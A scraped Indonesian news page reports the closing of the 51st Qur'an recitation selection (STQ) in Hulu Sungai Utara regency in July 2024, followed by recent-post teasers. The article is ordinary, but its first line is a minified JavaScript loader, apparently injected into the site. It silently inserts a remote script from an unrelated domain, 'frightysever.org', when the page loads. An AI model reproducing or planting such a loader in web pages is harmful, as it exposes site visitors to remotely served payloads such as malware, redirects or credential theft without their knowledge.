(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

STQ Tingkat Kabupaten HSU 2024 Ditutup Menuju MTQ Kalsel 2025


KANALKALIMANTAN.COM, AMUNTAI – Setelah sepekan mengadakan Seleksi Tilawatil Qur’an (STQ) ke-51 tingkat Kabupaten Hulu Sungai Utara (HSU) 2024 akhirnya resmi ditutup dengan terpilihnya para qori-qoriah terbaik.

Ketua Lembaga Pengembangan Tilawatil Qur’an (LPTQ) Kabupaten HSU H Husairi Abdi, pelaksanaan STQ ini dalam rangka persiapan kafilah Kabupaten HSU untuk mengikuti MTQ tingkat Provinsi Kalimantan Selatan tahun 2025.

“Hasil ini akan kita jadikan peserta MTQ Provinsi Kalimantan Selatan di Kabupaten Banjar tahun 2025 mendatang,” katanya, saat penutupan STQ di Aula Dr KH Idham Chalid, Kamis (18/7/2024) siang.

Baca juga: Ditinggal Sekda Banjarbaru Pensiun Dini, Kursi Lowong Tunggu Calon Pengganti

Seleksi yang digelar ini, Husairi berharap nantinya tahapan MTQ mulai dari tingkat kecamatan, kabupaten hingga menghadapi MTQ tingkat provinsi dapat berjalan dengan persiapan matang.

Husairi berpesan, para juara di STQ ini, nantinya agar lebih giat belajar dan berlatih guna menghadapi MTQ tahun depan, baik dari cabang tilawah, sari tilawah, tilawah anak, hifzil Qur’an, dan cabang lainnya.

Dirinya mengakui peran serta sekolah, pondok pesantren dan rumah tahfiz yang ada di Kabupaten HSU dalam pembinaan diharapkan dapat mencetak qori qoriah dan para hafiz hafizah secara maksimal.

Baca juga: Cincin di Kelingking OGDJ Bikin Bengkak, Damkar HSU Lakukan Pemotongan

Terakhir, Husairi juga menyampaikan apresiasi dan ucapan terimakasih kepada jajaran LPTQ dan Pemerintah Kabupaten HSU atas dukungan pelaksanaan STQ dapat berjalan dengan baik dan lancar.

“Insyaallah kedepannya mulai tahun 2025 ini akan kita lakukan pembinaan yang lebih intens lagi, sehingga kita mencetak hafiz hafizah, qori-qoriah baik anak-anak maupun dewasa,” tutupnya.

Sementara itu, Penjabat (Pj) Bupati HSU melalui Asisten 1 Bidang Pemerintahan dan Kesra, Khairussalim menyampaikan ucapan syukur atas kegiatan STQ kali ini.

Baca juga: Bawaslu Kalsel Launching Pengawasan Pilkada 2024

Dirinya menilai, pentingnya pelaksanaan seleksi selain untuk meningkatkan kualitas iman dan takwa juga diharapkan dapat memotivasi LPTQ kabupaten dan kecamatan lebih efektif dan giat mengembangkan Al Qur’an.

“Selain itu dampak positif dalam penyelenggaraan ini adalah mencetak para qori dan qoriah dan terbaik yang ada di daerah kita yang nantinya untuk mengikuti tingkat Provinsi Kalimantan Selatan,” pungkasnya.

Kegiatan STQ yang diselenggarakan LPTQ Kabupaten HSU berlangsung selama enam hari dari tanggal 13-18 Juli 2024.(Kanalkalimantan.com/dew)

Reporter : dew
Editor : bie


Muhammad Andi

Recent Posts

Tim Kuasa Hukum Keluarga Juwita Soroti Dua Pasal Dakwaan

KANALKALIMANTAN.COM, BANJARBARU - Advokasi Untuk Keadilan (AUK) Juwita mendampingi pihak keluarga menghadiri proses pelimpahan perkara… Read More

47 menit ago

Odmil III-15 Banjarmasin Limpahkan Kasus Juwita ke Pengadilan Militer

KANALKALIMANTAN.COM, BANJARBARU - Oditurat Militer (Odmil) III-15 Banjarmasin melimpahlan perkara kasus pembunuhan berencana yang dilakukan… Read More

4 jam ago

Disogok, Tiga Polisi Polres Samarinda ‘Bebaskan’ Tahanan Nyabu di Sel

KANALKALIMANTAN.COM, SAMARINDA – Tiga oknum polisi diduga membiarkan narkoba masuk ke ruang tahanan Mapolres Samarinda,… Read More

4 jam ago

9 Klien Rehabilitasi Narkoba Dapat Pendampingan Kesbangpol dan BNNK HSU

KANALKALIMANTAN.COM, AMUNTAI - Sebanyak 9 klien rehabilitasi narkoba mendapat fasilitas dan pendampingan rujukan ke Balai… Read More

4 jam ago

DPKP Kabupaten Banjar Laksanakan Forum Perangkat Daerah

KANALKALIMANTAN.COM, MARTAPURA – Dinas Pemadam Kebakaran dan Penyelamatan (DPKP) Kabupaten Banjar menggelar Forum Perangkat Daerah… Read More

17 jam ago

Hj Siti Saniah Ditetapkan sebagai Ibunda Guru Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Ketua Tim Penggerak PKK Kabupaten Kapuas Hj Siti Saniah secara resmi… Read More

19 jam ago